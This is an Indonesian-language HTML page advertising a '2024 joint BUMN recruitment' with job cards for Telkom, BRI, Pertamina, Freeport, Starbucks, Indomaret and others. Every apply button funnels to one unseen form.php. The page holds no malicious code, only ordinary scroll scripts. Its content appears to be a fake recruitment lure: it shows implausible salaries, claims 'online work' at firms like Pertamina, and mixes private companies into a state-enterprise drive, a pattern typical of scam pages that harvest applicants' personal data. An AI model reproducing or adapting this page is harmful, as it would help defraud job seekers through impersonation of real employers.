<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta property="og:title" content="Rekrutmen Bersama BUMN 2024">
    <meta property="og:image" content="./public/images/bumn.png">
    <meta name="description" content="Info Lowongan pekerjaan BUMN dan Swasta 2024 | TELKOM | MR DIY | BANK BRI | PENGADAIAN | PT FREEPORT | ALFAMART PERTAMINA| DAFTAR SEKARANG!! KLIK SINI ...">
    <meta name="author" content="Rekrutmen Bersama BUMN 2024">
    <title>LOKER BUMN</title>
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin="">
    <link href="https://fonts.googleapis.com/css2?family=Poppins:ital,wght@0,100;0,200;0,300;0,400;0,500;0,600;0,700;0,800;0,900;1,100;1,200;1,300;1,400;1,500;1,600;1,700;1,800;1,900&amp;family=Protest+Guerrilla&amp;family=Roboto:ital,wght@0,100;0,300;0,400;0,500;0,700;0,900;1,100;1,300;1,400;1,500;1,700;1,900&amp;display=swap" rel="stylesheet">
    <link rel="icon" href="./public/images/favicon.ico" type="image/x-icon" sizes="32x25">
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.3/dist/css/bootstrap.min.css" rel="stylesheet">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/toastr.js/latest/toastr.min.css">
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap-icons@1.11.3/font/bootstrap-icons.min.css">
    <link rel="stylesheet" href="./public/css/style.css">
</head>

<body cz-shortcut-listen="true">
    <div class="loading" style="display: none" id="loading">
        <div class="loader"></div>
    </div>

    <nav class="navbar navbar-expand-lg fixed-top navbar-custom navbar-scrolled">
        <div class="container">
            <a class="navbar-brand" href="#">
                <img src="./public/images/logo.png" height="40">
            </a>
            <button class="navbar-toggler" type="button" data-bs-toggle="collapse" data-bs-target="#navbarSupportedContent" aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
                <span class="navbar-toggler-icon"></span>
            </button>
            <div class="collapse navbar-collapse" id="navbarSupportedContent">
                <ul class="navbar-nav me-auto mb-2 mb-lg-0"></ul>
            </div>
        </div>
    </nav>

    <header>
        <div class="container">
            <div class="row">
                <div class="col-lg-6 d-flex flex-column align-items-center justify-content-center mb-3">
                    <h2 class="text-center">“BUMN Terus Ciptakan Lapangan Kerja”</h2>
                    <p>
                        Lebih dari 100 Perusahaan BUMN Grup membuka lowongan untuk Putra
                        Putri Terbaik Indonesia melalui Rekrutmen Bersama BUMN Grup 2024.
                        Mari memberikan yang terbaik untuk negara.
                    </p>
                    <div class="mt-5 text-center">
                        <a href="#main" class="btn btn-daftar text-uppercase">Daftar Sekarang</a>
                    </div>
                </div>

                <div class="col-lg-6">
                    <img class="w-100" src="./public/images/banner-left.png" alt="">
                </div>
            </div>
        </div>
    </header>

    <main id="main">
        <div class="container">
            <div class="row">
                <div class="col-12">
                    <h2 class="text-center">LOWONGAN PEKERJAAN BERIKUT ADA DIBAWAH</h2>
                    <p class="text-center">
                        Silahkan pilih salah satu pekerjaan yang Anda minati
                    </p>
                </div>
            </div>

            <div class="row justify-content-center mt-3">
                <div class="col-md-6 col-lg-4 mb-3">
                    <div class="card">
                        <div class="card-body px-3">
                            <div class="card-image py-3">
                                <img src="./public/images/telkom.png" alt="">
                            </div>

                            <div class="card-content">
                                <h2 class="text-uppercase text-center">Telkom Indonesia</h2>
                                <div class="mb-1">
                                    <i class="bi bi-cash me-3"></i>
                                    <span>5 Juta - 20 Juta/Bulan</span>
                                </div>
                                <div class="mb-1">
                                    <i class="bi bi-clock me-3"></i>
                                    <span>Full Time</span>
                                </div>
                                <div class="mb-1">
                                    <i class="bi bi-briefcase me-3"></i>
                                    <span>Berpengalaman</span>
                                </div>
                                <div class="mb-1">
                                    <i class="bi bi-check-lg me-3"></i>
                                    <span>Tersedia Training</span>
                                </div>
                            </div>

                            <div class="mt-3 text-center card-bottom">
                                <a href="./form.php" data-img="./public/images/telkom2.jpg" class="btn btn-yellow text-uppercase">Daftar Sekarang</a>
                            </div>
                        </div>
                    </div>
                </div>

                <div class="col-md-6 col-lg-4 mb-3">
                    <div class="card">
                        <div class="card-body px-3">
                            <div class="card-image py-3">
                                <img src="./public/images/diy.jpg" alt="">
                            </div>

                            <div class="card-content">
                                <h2 class="text-uppercase text-center">
                                    Lowongan Kerja MR.DIY
                                </h2>
                                <div class="mb-1">
                                    <i class="bi bi-cash me-3"></i>
                                    <span>6 Juta - 15 Juta/Bulan</span>
                                </div>
                                <div class="mb-1">
                                    <i class="bi bi-clock me-3"></i>
                                    <span>Full Time</span>
                                </div>
                                <div class="mb-1">
                                    <i class="bi bi-briefcase me-3"></i>
                                    <span>Pengalaman/Non Pengalaman</span>
                                </div>
                                <div class="mb-1">
                                    <i class="bi bi-house me-3"></i>
                                    <span>Pekerjaan Online</span>
                                </div>
                                <div class="mb-1">
                                    <i class="bi bi-check-lg me-3"></i>
                                    <span>Tersedia Training</span>
                                </div>
                            </div>

                            <div class="mt-3 text-center card-bottom">
                                <a href="./form.php" data-img="./public/images/diy2.png" class="btn btn-yellow text-uppercase">Daftar Sekarang</a>
                            </div>
                        </div>
                    </div>
                </div>

                <div class="col-md-6 col-lg-4 mb-3">
                    <div class="card">
                        <div class="card-body px-3">
                            <div class="card-image py-3">
                                <img src="./public/images/bri.jpg" alt="">
                            </div>

                            <div class="card-content">
                                <h2 class="text-uppercase text-center">
                                    Lowongan Kerja Bank BRI
                                </h2>
                                <div class="mb-1">
                                    <i class="bi bi-cash me-3"></i>
                                    <span>5 Juta - 10 Juta/Bulan</span>
                                </div>
                                <div class="mb-1">
                                    <i class="bi bi-clock me-3"></i>
                                    <span>Full Time / Part Time</span>
                                </div>
                                <div class="mb-1">
                                    <i class="bi bi-briefcase me-3"></i>
                                    <span>Pengalaman/Non Pengalaman</span>
                                </div>
                                <div class="mb-1">
                                    <i class="bi bi-check-lg me-3"></i>
                                    <span>Tersedia Training</span>
                                </div>
                            </div>

                            <div class="mt-3 text-center card-bottom">
                                <a href="./form.php" data-img="./public/images/bri2.jpg" class="btn btn-yellow text-uppercase">Daftar Sekarang</a>
                            </div>
                        </div>
                    </div>
                </div>

                <div class="col-md-6 col-lg-4 mb-3">
                    <div class="card">
                        <div class="card-body px-3">
                            <div class="card-image py-3">
                                <img src="./public/images/pegadaian.png" alt="">
                            </div>

                            <div class="card-content">
                                <h2 class="text-uppercase text-center">
                                    Lowongan Kerja Pegadaian
                                </h2>
                                <div class="mb-1">
                                    <i class="bi bi-cash me-3"></i>
                                    <span>5 Juta - 7 Juta/Bulan</span>
                                </div>
                                <div class="mb-1">
                                    <i class="bi bi-clock me-3"></i>
                                    <span>Full Time </span>
                                </div>
                                <div class="mb-1">
                                    <i class="bi bi-briefcase me-3"></i>
                                    <span>Pengalaman/Non Pengalaman</span>
                                </div>
                                <div class="mb-1">
                                    <i class="bi bi-check-lg me-3"></i>
                                    <span>Tersedia Training</span>
                                </div>
                            </div>

                            <div class="mt-3 text-center card-bottom">
                                <a href="./form.php" data-img="./public/images/pegadaian2.jpg" class="btn btn-yellow text-uppercase">Daftar Sekarang</a>
                            </div>
                        </div>
                    </div>
                </div>

                <div class="col-md-6 col-lg-4 mb-3">
                    <div class="card">
                        <div class="card-body px-3">
                            <div class="card-image py-3">
                                <img src="./public/images/freeeport.png" alt="">
                            </div>

                            <div class="card-content">
                                <h2 class="text-uppercase text-center">
                                    PT. Freeport Indonesia
                                </h2>
                                <div class="mb-1">
                                    <i class="bi bi-cash me-3"></i>
                                    <span>9 Juta - 50 Juta/Bulan</span>
                                </div>
                                <div class="mb-1">
                                    <i class="bi bi-clock me-3"></i>
                                    <span>Full Time / Part Time</span>
                                </div>
                                <div class="mb-1">
                                    <i class="bi bi-briefcase me-3"></i>
                                    <span>Pengalaman/Non Pengalaman</span>
                                </div>
                                <div class="mb-1">
                                    <i class="bi bi-check-lg me-3"></i>
                                    <span>Tersedia Training</span>
                                </div>
                            </div>

                            <div class="mt-3 text-center card-bottom">
                                <a href="./form.php" data-img="./public/images/freeport2.jpg" class="btn btn-yellow text-uppercase">Daftar Sekarang</a>
                            </div>
                        </div>
                    </div>
                </div>

                <div class="col-md-6 col-lg-4 mb-3">
                    <div class="card">
                        <div class="card-body px-3">
                            <div class="card-image py-3">
                                <img src="./public/images/alfa1.jpg" alt="">
                            </div>

                            <div class="card-content">
                                <h2 class="text-uppercase text-center">Alfa Mart</h2>
                                <div class="mb-1">
                                    <i class="bi bi-cash me-3"></i>
                                    <span>7 Juta/Bulan</span>
                                </div>
                                <div class="mb-1">
                                    <i class="bi bi-clock me-3"></i>
                                    <span>Full Time</span>
                                </div>
                                <div class="mb-1">
                                    <i class="bi bi-briefcase me-3"></i>
                                    <span>Pengalaman/Non Pengalaman</span>
                                </div>
                                <div class="mb-1">
                                    <i class="bi bi-check-lg me-3"></i>
                                    <span>Tersedia Training</span>
                                </div>
                            </div>

                            <div class="mt-3 text-center card-bottom">
                                <a href="./form.php" data-img="./public/images/alfa2.jpg" class="btn btn-yellow text-uppercase">Daftar Sekarang</a>
                            </div>
                        </div>
                    </div>
                </div>

                <div class="col-md-6 col-lg-4 mb-3">
                    <div class="card">
                        <div class="card-body px-3">
                            <div class="card-image py-3">
                                <img src="./public/images/pertamina.webp" alt="">
                            </div>

                            <div class="card-content">
                                <h2 class="text-uppercase text-center">
                                    Lowongan Kerja Pertamina
                                </h2>
                                <div class="mb-1">
                                    <i class="bi bi-cash me-3"></i>
                                    <span>5,1 Juta - 9 Juta/Bulan</span>
                                </div>
                                <div class="mb-1">
                                    <i class="bi bi-clock me-3"></i>
                                    <span>Full Time / Part Time</span>
                                </div>
                                <div class="mb-1">
                                    <i class="bi bi-briefcase me-3"></i>
                                    <span>Pengalaman/Non Pengalaman</span>
                                </div>
                                <div class="mb-1">
                                    <i class="bi bi-house me-3"></i>
                                    <span>Pekerjaan Online</span>
                                </div>
                                <div class="mb-1">
                                    <i class="bi bi-check-lg me-3"></i>
                                    <span>Tersedia Training</span>
                                </div>
                            </div>

                            <div class="mt-3 text-center card-bottom">
                                <a href="./form.php" data-img="./public/images/pertamina2.webp" class="btn btn-yellow text-uppercase">Daftar Sekarang</a>
                            </div>
                        </div>
                    </div>
                </div>

                <div class="col-md-6 col-lg-4 mb-3">
                    <div class="card">
                        <div class="card-body px-3">
                            <div class="card-image py-3">
                                <img src="./public/images/bni.jpg" alt="">
                            </div>

                            <div class="card-content">
                                <h2 class="text-uppercase text-center">
                                    Lowongan Kerja Bank BNI
                                </h2>
                                <div class="mb-1">
                                    <i class="bi bi-cash me-3"></i>
                                    <span>6 Juta - 14 Juta/Bulan</span>
                                </div>
                                <div class="mb-1">
                                    <i class="bi bi-clock me-3"></i>
                                    <span>Full Time</span>
                                </div>
                                <div class="mb-1">
                                    <i class="bi bi-briefcase me-3"></i>
                                    <span>Pengalaman/Non Pengalaman</span>
                                </div>
                                <div class="mb-1">
                                    <i class="bi bi-house me-3"></i>
                                    <span>Pekerjaan Online</span>
                                </div>
                                <div class="mb-1">
                                    <i class="bi bi-check-lg me-3"></i>
                                    <span>Tersedia Training</span>
                                </div>
                            </div>

                            <div class="mt-3 text-center card-bottom">
                                <a href="./form.php" data-img="./public/images/bni2.jpg" class="btn btn-yellow text-uppercase">Daftar Sekarang</a>
                            </div>
                        </div>
                    </div>
                </div>

                <div class="col-md-6 col-lg-4 mb-3">
                    <div class="card">
                        <div class="card-body px-3">
                            <div class="card-image py-3">
                                <img src="./public/images/pstore.jpg" alt="">
                            </div>

                            <div class="card-content">
                                <h2 class="text-uppercase text-center">
                                    Lowongan Kerja PT Putra Siregar Merakyat (PStore)
                                </h2>
                                <div class="mb-1">
                                    <i class="bi bi-cash me-3"></i>
                                    <span>5 Juta/Bulan</span>
                                </div>
                                <div class="mb-1">
                                    <i class="bi bi-clock me-3"></i>
                                    <span>Full Time</span>
                                </div>
                                <div class="mb-1">
                                    <i class="bi bi-briefcase me-3"></i>
                                    <span>Pengalaman/Non Pengalaman</span>
                                </div>
                                <div class="mb-1">
                                    <i class="bi bi-house me-3"></i>
                                    <span>Pekerjaan Online</span>
                                </div>
                                <div class="mb-1">
                                    <i class="bi bi-check-lg me-3"></i>
                                    <span>Tersedia Training</span>
                                </div>
                            </div>

                            <div class="mt-3 text-center card-bottom">
                                <a href="./form.php" data-img="./public/images/pstore2.jpg" class="btn btn-yellow text-uppercase">Daftar Sekarang</a>
                            </div>
                        </div>
                    </div>
                </div>

                <div class="col-md-6 col-lg-4 mb-3">
                    <div class="card">
                        <div class="card-body px-3">
                            <div class="card-image py-3">
                                <img src="./public/images/indo.png" alt="">
                            </div>

                            <div class="card-content">
                                <h2 class="text-uppercase text-center">
                                    Lowongan Kerja Indomaret
                                </h2>
                                <div class="mb-1">
                                    <i class="bi bi-cash me-3"></i>
                                    <span>2,5 Juta - 5 Juta/Bulan</span>
                                </div>
                                <div class="mb-1">
                                    <i class="bi bi-clock me-3"></i>
                                    <span>Full Time / Part Time</span>
                                </div>
                                <div class="mb-1">
                                    <i class="bi bi-briefcase me-3"></i>
                                    <span>Pengalaman/Non Pengalaman</span>
                                </div>
                                <div class="mb-1">
                                    <i class="bi bi-check-lg me-3"></i>
                                    <span>Tersedia Training</span>
                                </div>
                            </div>

                            <div class="mt-3 text-center card-bottom">
                                <a href="./form.php" data-img="./public/images/indomaret2.jpg" class="btn btn-yellow text-uppercase">Daftar Sekarang</a>
                            </div>
                        </div>
                    </div>
                </div>

                <div class="col-md-6 col-lg-4 mb-3">
                    <div class="card">
                        <div class="card-body px-3">
                            <div class="card-image py-3">
                                <img src="./public/images/cpns.jpeg" alt="">
                            </div>

                            <div class="card-content">
                                <h2 class="text-uppercase text-center">
                                    Lowongan Kerja CPNS
                                </h2>
                                <div class="mb-1">
                                    <i class="bi bi-cash me-3"></i>
                                    <span>5 Juta - 9 Juta/Bulan</span>
                                </div>
                                <div class="mb-1">
                                    <i class="bi bi-clock me-3"></i>
                                    <span>Full Time</span>
                                </div>
                                <div class="mb-1">
                                    <i class="bi bi-briefcase me-3"></i>
                                    <span>Pengalaman/Non Pengalaman</span>
                                </div>
                                <div class="mb-1">
                                    <i class="bi bi-check-lg me-3"></i>
                                    <span>Tersedia Training</span>
                                </div>
                            </div>

                            <div class="mt-3 text-center card-bottom">
                                <a href="./form.php" data-img="./public/images/cpns.jpeg" class="btn btn-yellow text-uppercase">Daftar Sekarang</a>
                            </div>
                        </div>
                    </div>
                </div>

                <div class="col-md-6 col-lg-4 mb-3">
                    <div class="card">
                        <div class="card-body px-3">
                            <div class="card-image py-3">
                                <img src="./public/images/alfa3.png" alt="">
                            </div>

                            <div class="card-content">
                                <h2 class="text-uppercase text-center">
                                    Lowongan Kerja Alfa Midi
                                </h2>
                                <div class="mb-1">
                                    <i class="bi bi-cash me-3"></i>
                                    <span>1,5 Juta - 5,5 Juta/Bulan</span>
                                </div>
                                <div class="mb-1">
                                    <i class="bi bi-clock me-3"></i>
                                    <span>Full Time</span>
                                </div>
                                <div class="mb-1">
                                    <i class="bi bi-briefcase me-3"></i>
                                    <span>Pengalaman/Non Pengalaman</span>
                                </div>
                                <div class="mb-1">
                                    <i class="bi bi-check-lg me-3"></i>
                                    <span>Tersedia Training</span>
                                </div>
                            </div>

                            <div class="mt-3 text-center card-bottom">
                                <a href="./form.php" data-img="./public/images/alfa3.png" class="btn btn-yellow text-uppercase">Daftar Sekarang</a>
                            </div>
                        </div>
                    </div>
                </div>

                <div class="col-md-6 col-lg-4 mb-3">
                    <div class="card">
                        <div class="card-body px-3">
                            <div class="card-image py-3">
                                <img src="./public/images/indof.png" alt="">
                            </div>

                            <div class="card-content">
                                <h2 class="text-uppercase text-center">
                                    Lowongan Kerja Indofood
                                </h2>
                                <div class="mb-1">
                                    <i class="bi bi-cash me-3"></i>
                                    <span>1,5 Juta - 5 Juta/Bulan</span>
                                </div>
                                <div class="mb-1">
                                    <i class="bi bi-clock me-3"></i>
                                    <span>Full Time</span>
                                </div>
                                <div class="mb-1">
                                    <i class="bi bi-briefcase me-3"></i>
                                    <span>Pengalaman/Non Pengalaman</span>
                                </div>
                                <div class="mb-1">
                                    <i class="bi bi-house me-3"></i>
                                    <span>Pekerjaan Online</span>
                                </div>
                                <div class="mb-1">
                                    <i class="bi bi-check-lg me-3"></i>
                                    <span>Tersedia Training</span>
                                </div>
                            </div>

                            <div class="mt-3 text-center card-bottom">
                                <a href="./form.php" data-img="./public/images/indof.png" class="btn btn-yellow text-uppercase">Daftar Sekarang</a>
                            </div>
                        </div>
                    </div>
                </div>

                <div class="col-md-6 col-lg-4 mb-3">
                    <div class="card">
                        <div class="card-body px-3">
                            <div class="card-image py-3">
                                <img src="./public/images/toyo.png" alt="">
                            </div>

                            <div class="card-content">
                                <h2 class="text-uppercase text-center">
                                    Lowongan Kerja Toyota - Astra Motor
                                </h2>
                                <div class="mb-1">
                                    <i class="bi bi-cash me-3"></i>
                                    <span>3 Juta - 12,5 Juta/Bulan</span>
                                </div>
                                <div class="mb-1">
                                    <i class="bi bi-clock me-3"></i>
                                    <span>Full Time</span>
                                </div>
                                <div class="mb-1">
                                    <i class="bi bi-briefcase me-3"></i>
                                    <span>Pengalaman/Non Pengalaman</span>
                                </div>
                                <div class="mb-1">
                                    <i class="bi bi-check-lg me-3"></i>
                                    <span>Tersedia Training</span>
                                </div>
                            </div>

                            <div class="mt-3 text-center card-bottom">
                                <a href="./form.php" data-img="./public/images/toyo.png" class="btn btn-yellow text-uppercase">Daftar Sekarang</a>
                            </div>
                        </div>
                    </div>
                </div>

                <div class="col-md-6 col-lg-4 mb-3">
                    <div class="card">
                        <div class="card-body px-3">
                            <div class="card-image py-3">
                                <img src="./public/images/vale.png" alt="">
                            </div>

                            <div class="card-content">
                                <h2 class="text-uppercase text-center">
                                    Lowongan Kerja PT Vale Indonesia
                                </h2>
                                <div class="mb-1">
                                    <i class="bi bi-cash me-3"></i>
                                    <span>5 Juta - 9 Juta/Bulan</span>
                                </div>
                                <div class="mb-1">
                                    <i class="bi bi-clock me-3"></i>
                                    <span>Full Time</span>
                                </div>
                                <div class="mb-1">
                                    <i class="bi bi-briefcase me-3"></i>
                                    <span>Pengalaman/Non Pengalaman</span>
                                </div>
                                <div class="mb-1">
                                    <i class="bi bi-house me-3"></i>
                                    <span>Pekerjaan Online</span>
                                </div>
                                <div class="mb-1">
                                    <i class="bi bi-check-lg me-3"></i>
                                    <span>Tersedia Training</span>
                                </div>
                            </div>

                            <div class="mt-3 text-center card-bottom">
                                <a href="./form.php" data-img="./public/images/vale.png" class="btn btn-yellow text-uppercase">Daftar Sekarang</a>
                            </div>
                        </div>
                    </div>
                </div>

                <div class="col-md-6 col-lg-4 mb-3">
                    <div class="card">
                        <div class="card-body px-3">
                            <div class="card-image py-3">
                                <img src="./public/images/kimia.png" alt="">
                            </div>

                            <div class="card-content">
                                <h2 class="text-uppercase text-center">
                                    Lowongan Kerja Kimia Farma
                                </h2>
                                <div class="mb-1">
                                    <i class="bi bi-cash me-3"></i>
                                    <span>1,5 Juta - 4,5 Juta/Bulan</span>
                                </div>
                                <div class="mb-1">
                                    <i class="bi bi-clock me-3"></i>
                                    <span>Full Time</span>
                                </div>
                                <div class="mb-1">
                                    <i class="bi bi-briefcase me-3"></i>
                                    <span>Pengalaman/Non Pengalaman</span>
                                </div>
                                <div class="mb-1">
                                    <i class="bi bi-check-lg me-3"></i>
                                    <span>Tersedia Training</span>
                                </div>
                            </div>

                            <div class="mt-3 text-center card-bottom">
                                <a href="./form.php" data-img="./public/images/kimia.png" class="btn btn-yellow text-uppercase">Daftar Sekarang</a>
                            </div>
                        </div>
                    </div>
                </div>

                <div class="col-md-6 col-lg-4 mb-3">
                    <div class="card">
                        <div class="card-body px-3">
                            <div class="card-image py-3">
                                <img src="./public/images/jte.png" alt="">
                            </div>

                            <div class="card-content">
                                <h2 class="text-uppercase text-center">
                                    Lowongan Kerja J&amp;T Express
                                </h2>
                                <div class="mb-1">
                                    <i class="bi bi-cash me-3"></i>
                                    <span>5 Juta - 9 Juta/Bulan</span>
                                </div>
                                <div class="mb-1">
                                    <i class="bi bi-clock me-3"></i>
                                    <span>Full Time</span>
                                </div>
                                <div class="mb-1">
                                    <i class="bi bi-briefcase me-3"></i>
                                    <span>Pengalaman/Non Pengalaman</span>
                                </div>
                                <div class="mb-1">
                                    <i class="bi bi-house me-3"></i>
                                    <span>Pekerjaan Online</span>
                                </div>
                                <div class="mb-1">
                                    <i class="bi bi-check-lg me-3"></i>
                                    <span>Tersedia Training</span>
                                </div>
                            </div>

                            <div class="mt-3 text-center card-bottom">
                                <a href="./form.php" data-img="./public/images/jte2.png" class="btn btn-yellow text-uppercase">Daftar Sekarang</a>
                            </div>
                        </div>
                    </div>
                </div>

                <div class="col-md-6 col-lg-4 mb-3">
                    <div class="card">
                        <div class="card-body px-3">
                            <div class="card-image py-3">
                                <img src="./public/images/mitra.png" alt="">
                            </div>

                            <div class="card-content">
                                <h2 class="text-uppercase text-center">
                                    Lowongan Kerja Mitra10
                                </h2>
                                <div class="mb-1">
                                    <i class="bi bi-cash me-3"></i>
                                    <span>2 Juta - 5 Juta/Bulan</span>
                                </div>
                                <div class="mb-1">
                                    <i class="bi bi-clock me-3"></i>
                                    <span>Full Time</span>
                                </div>
                                <div class="mb-1">
                                    <i class="bi bi-briefcase me-3"></i>
                                    <span>Pengalaman/Non Pengalaman</span>
                                </div>
                                <div class="mb-1">
                                    <i class="bi bi-house me-3"></i>
                                    <span>Pekerjaan Online</span>
                                </div>
                                <div class="mb-1">
                                    <i class="bi bi-check-lg me-3"></i>
                                    <span>Tersedia Training</span>
                                </div>
                            </div>

                            <div class="mt-3 text-center card-bottom">
                                <a href="./form.php" data-img="./public/images/mitra.png" class="btn btn-yellow text-uppercase">Daftar Sekarang</a>
                            </div>
                        </div>
                    </div>
                </div>

                <div class="col-md-6 col-lg-4 mb-3">
                    <div class="card">
                        <div class="card-body px-3">
                            <div class="card-image py-3">
                                <img src="./public/images/star.png" alt="">
                            </div>

                            <div class="card-content">
                                <h2 class="text-uppercase text-center">
                                    Lowongan Kerja Starbucks Cafe
                                </h2>
                                <div class="mb-1">
                                    <i class="bi bi-cash me-3"></i>
                                    <span>5 Juta - 9 Juta/Bulan</span>
                                </div>
                                <div class="mb-1">
                                    <i class="bi bi-clock me-3"></i>
                                    <span>Full Time</span>
                                </div>
                                <div class="mb-1">
                                    <i class="bi bi-briefcase me-3"></i>
                                    <span>Pengalaman/Non Pengalaman</span>
                                </div>
                                <div class="mb-1">
                                    <i class="bi bi-house me-3"></i>
                                    <span>Pekerjaan Online</span>
                                </div>
                                <div class="mb-1">
                                    <i class="bi bi-check-lg me-3"></i>
                                    <span>Tersedia Training</span>
                                </div>
                            </div>

                            <div class="mt-3 text-center card-bottom">
                                <a href="./form.php" data-img="./public/images/star.png" class="btn btn-yellow text-uppercase">Daftar Sekarang</a>
                            </div>
                        </div>
                    </div>
                </div>

                <div class="col-md-6 col-lg-4 mb-3">
                    <div class="card">
                        <div class="card-body px-3">
                            <div class="card-image py-3">
                                <img src="./public/images/pos.jpg" alt="">
                            </div>

                            <div class="card-content">
                                <h2 class="text-uppercase text-center">
                                    Lowongan Kerja Pos Indonesia
                                </h2>
                                <div class="mb-1">
                                    <i class="bi bi-cash me-3"></i>
                                    <span>6 Juta - 11 Juta/Bulan</span>
                                </div>
                                <div class="mb-1">
                                    <i class="bi bi-clock me-3"></i>
                                    <span>Full Time / Part Time</span>
                                </div>
                                <div class="mb-1">
                                    <i class="bi bi-briefcase me-3"></i>
                                    <span>Pengalaman/Non Pengalaman</span>
                                </div>
                                <div class="mb-1">
                                    <i class="bi bi-house me-3"></i>
                                    <span>Pekerjaan Online</span>
                                </div>
                                <div class="mb-1">
                                    <i class="bi bi-check-lg me-3"></i>
                                    <span>Tersedia Training</span>
                                </div>
                            </div>

                            <div class="mt-3 text-center card-bottom">
                                <a href="./form.php" data-img="./public/images/pos2.jpg" class="btn btn-yellow text-uppercase">Daftar Sekarang</a>
                            </div>
                        </div>
                    </div>
                </div>

                <div class="col-md-6 col-lg-4 mb-3">
                    <div class="card">
                        <div class="card-body px-3">
                            <div class="card-image py-3">
                                <img src="./public/images/allbumn.jpg" alt="">
                            </div>

                            <div class="card-content">
                                <h2 class="text-uppercase text-center">
                                    Lowongan Kerja BUMN 2024
                                </h2>
                                <p>
                                    Jika anda kurang beruntung atau tidak berminat dengan
                                    lowongan diatas, anda bisa cek disini untuk lowongan
                                    pekerjaan yang kami rekomendasikan dan tidak dipungut biaya
                                    administrasi.
                                </p>
                            </div>

                            <div class="mt-3 text-center card-bottom">
                                <a href="./form.php" data-img="./public/images/allbumn2.png" class="btn btn-yellow text-uppercase">Periksa Sekarang</a>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>

            <button id="scrollTopBtn" title="Go to top" style="display: inline-block;">
                <i class="bi bi-chevron-up"></i>
            </button>

            <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.3.3/dist/js/bootstrap.bundle.min.js"></script>
            <script src="https://cdnjs.cloudflare.com/ajax/libs/toastr.js/latest/toastr.min.js"></script>
            <script src="https://code.jquery.com/jquery.min.js"></script>
            <script type="text/javascript">
                $(window).scroll(function() {
                    if ($(this).scrollTop() > 50) {
                        // Set the scroll position for the color change
                        $(".navbar").addClass("navbar-scrolled");
                    } else {
                        $(".navbar").removeClass("navbar-scrolled");
                    }
                });
                $(document).ready(function() {
                    // Show or hide the button when scrolling
                    $(window).scroll(function() {
                        if ($(this).scrollTop() > 20) {
                            $("#scrollTopBtn").fadeIn();
                        } else {
                            $("#scrollTopBtn").fadeOut();
                        }
                    });

                    // Scroll to the top when the button is clicked
                    $("#scrollTopBtn").click(function() {
                        $("html, body").animate({
                            scrollTop: 0
                        }, 800); // 800 is the duration in milliseconds
                        return false;
                    });
                });

                $(".btn-yellow").click(function(e) {
                    e.preventDefault();
                    var img = $(this).data("img");
                    var url = $(this).attr("href");
                    sessionStorage.setItem("img", img);
                    window.location.href = url;
                });
            </script>

</body>

</html>